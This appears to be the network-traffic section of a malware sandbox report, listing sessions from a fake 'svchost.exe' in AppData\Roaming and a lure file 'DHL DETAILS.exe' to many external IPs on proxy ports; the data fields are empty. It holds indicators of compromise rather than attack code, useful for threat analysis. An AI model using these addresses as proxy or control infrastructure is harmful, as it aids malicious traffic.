Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4654	192.168.2.5	64550	45.227.193.166	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4655	192.168.2.5	64566	8.218.231.62	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4656	192.168.2.5	63446	174.136.57.169	33761	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4657	192.168.2.5	64552	46.17.63.166	4444	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4658	192.168.2.5	64539	154.65.39.8	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4659	192.168.2.5	64180	192.111.134.10	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4660	192.168.2.5	64489	62.171.133.66	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4661	192.168.2.5	64080	184.178.172.28	15294	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4662	192.168.2.5	64607	172.67.181.107	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4663	192.168.2.5	64526	111.206.0.99	8181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4664	192.168.2.5	63477	148.66.130.53	5031	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4665	192.168.2.5	63487	161.97.173.78	35981	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4666	192.168.2.5	63434	148.72.212.212	33905	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4667	192.168.2.5	64606	129.213.150.205	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4668	192.168.2.5	64464	120.194.4.157	82	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4669	192.168.2.5	64596	184.185.2.12	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4670	192.168.2.5	64577	211.222.252.187	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4671	192.168.2.5	64473	117.160.250.163	9999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4672	192.168.2.5	64574	43.131.248.165	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4673	192.168.2.5	64644	154.208.10.126	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4674	192.168.2.5	64608	104.145.235.200	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4675	192.168.2.5	64580	177.12.118.160	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4676	192.168.2.5	64581	202.83.102.83	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4677	192.168.2.5	63513	162.214.121.11	2993	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4678	192.168.2.5	64019	78.38.108.199	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4679	192.168.2.5	64594	43.131.246.77	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4680	192.168.2.5	64595	45.11.95.165	5219	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4681	192.168.2.5	64600	52.67.10.183	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4682	192.168.2.5	64597	203.95.198.170	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4683	192.168.2.5	64588	52.172.1.186	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4684	192.168.2.5	64615	8.222.164.205	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4685	192.168.2.5	63522	195.169.35.214	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4686	192.168.2.5	64616	43.128.107.251	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4687	192.168.2.5	64643	31.207.38.66	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4688	192.168.2.5	64634	43.155.130.182	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4689	192.168.2.5	64654	184.170.248.5	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4690	192.168.2.5	64637	65.21.255.197	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4691	192.168.2.5	64638	120.76.42.209	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4692	192.168.2.5	64048	142.54.236.97	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4693	192.168.2.5	64110	103.83.178.205	2016	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4694	192.168.2.5	64645	113.160.154.23	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4695	192.168.2.5	64117	138.36.150.15	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4696	192.168.2.5	64668	52.35.240.119	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4697	192.168.2.5	64657	221.153.92.39	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4698	192.168.2.5	64540	42.61.48.219	8000	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4699	192.168.2.5	64658	80.67.8.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4700	192.168.2.5	64660	121.128.194.154	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4701	192.168.2.5	64663	47.243.114.192	8180	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4702	192.168.2.5	64662	58.234.116.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4703	192.168.2.5	64246	27.123.1.35	4153	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4704	192.168.2.5	64690	92.204.135.37	32524	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4705	192.168.2.5	64667	43.133.70.57	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4706	192.168.2.5	64671	84.39.112.144	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4707	192.168.2.5	63969	45.195.149.79	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4708	192.168.2.5	64317	39.105.27.30	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4709	192.168.2.5	64686	8.218.231.62	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4710	192.168.2.5	64144	112.51.96.118	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4711	192.168.2.5	64684	8.219.228.100	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4712	192.168.2.5	64721	52.54.249.241	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4713	192.168.2.5	64740	104.17.84.150	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4714	192.168.2.5	64682	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4715	192.168.2.5	64737	162.214.225.223	63452	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4716	192.168.2.5	64325	203.96.177.211	33382	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4717	192.168.2.5	64732	172.67.38.96	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4718	192.168.2.5	64688	103.49.202.250	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4719	192.168.2.5	64713	185.104.112.62	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4720	192.168.2.5	64778	172.67.206.105	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4721	192.168.2.5	64767	184.170.248.5	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4722	192.168.2.5	64300	117.160.250.133	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4723	192.168.2.5	64733	211.222.252.187	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4724	192.168.2.5	64783	54.152.3.36	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4725	192.168.2.5	64445	51.222.241.157	30011	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4726	192.168.2.5	64680	117.160.250.134	8899	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4727	192.168.2.5	64789	104.129.205.94	54321	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4728	192.168.2.5	64240	199.102.104.70	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4729	192.168.2.5	64430	45.182.176.38	9947	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4730	192.168.2.5	63627	8.130.39.155	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4731	192.168.2.5	64393	103.86.1.25	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4732	192.168.2.5	64463	45.4.202.9	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4733	192.168.2.5	64764	43.131.248.165	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4734	192.168.2.5	63630	183.80.130.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4735	192.168.2.5	64771	43.131.246.77	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4736	192.168.2.5	64768	202.83.102.83	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4737	192.168.2.5	64750	193.151.130.114	8086	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4738	192.168.2.5	64829	31.43.179.160	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4739	192.168.2.5	64784	8.222.164.205	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4740	192.168.2.5	64798	45.11.95.165	5219	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4741	192.168.2.5	64404	103.130.218.135	4002	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4742	192.168.2.5	64803	45.81.232.17	9165	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4743	192.168.2.5	64799	43.128.107.251	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4744	192.168.2.5	64796	203.95.198.170	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4745	192.168.2.5	64835	162.214.121.11	46760	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4746	192.168.2.5	64776	5.44.42.115	58386	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4747	192.168.2.5	64795	78.38.108.199	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4748	192.168.2.5	64619	72.210.221.197	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4749	192.168.2.5	64555	50.63.12.101	2953	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4750	192.168.2.5	64701	64.227.108.25	31908	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4751	192.168.2.5	64846	162.159.242.150	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4752	192.168.2.5	64801	63.250.52.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4753	192.168.2.5	64805	43.155.130.182	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4754	192.168.2.5	64720	117.160.250.132	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4755	192.168.2.5	64789	104.129.205.94	54321	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4756	192.168.2.5	64562	51.89.173.40	23854	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4757	192.168.2.5	64802	52.172.1.186	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4758	192.168.2.5	64822	121.171.57.2	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4759	192.168.2.5	64823	185.225.232.191	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4760	192.168.2.5	64830	91.189.177.190	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4761	192.168.2.5	64839	80.67.8.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4762	192.168.2.5	64832	120.76.42.209	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4763	192.168.2.5	64919	172.67.181.197	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4764	192.168.2.5	64847	155.185.15.56	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4765	192.168.2.5	64852	185.158.114.14	25697	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4766	192.168.2.5	64860	110.12.211.140	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4767	192.168.2.5	64844	221.153.92.39	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4768	192.168.2.5	65072	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4769	192.168.2.5	64601	93.188.161.84	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4770	192.168.2.5	64857	89.36.114.38	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4771	192.168.2.5	64968	172.67.255.224	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4772	192.168.2.5	64896	129.213.150.205	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4773	192.168.2.5	64854	45.195.149.79	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4774	192.168.2.5	64941	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4775	192.168.2.5	64933	184.169.154.119	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4776	192.168.2.5	64855	43.133.70.57	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4777	192.168.2.5	63749	159.65.245.255	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4778	192.168.2.5	64849	120.78.191.68	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4779	192.168.2.5	64841	58.234.116.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4780	192.168.2.5	64914	172.67.53.215	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4781	192.168.2.5	64906	162.214.227.68	55392	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4782	192.168.2.5	65127	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4783	192.168.2.5	65155	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4784	192.168.2.5	65160	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4785	192.168.2.5	64989	104.20.75.132	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4786	192.168.2.5	64886	27.96.235.171	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4787	192.168.2.5	64884	58.246.58.150	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4788	192.168.2.5	64811	196.204.24.254	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4789	192.168.2.5	65019	104.19.83.128	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4790	192.168.2.5	64938	184.170.248.5	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4791	192.168.2.5	64897	15.236.106.236	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4792	192.168.2.5	64859	14.207.65.204	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4793	192.168.2.5	65022	50.62.134.139	36916	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4794	192.168.2.5	64901	219.243.212.118	8443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
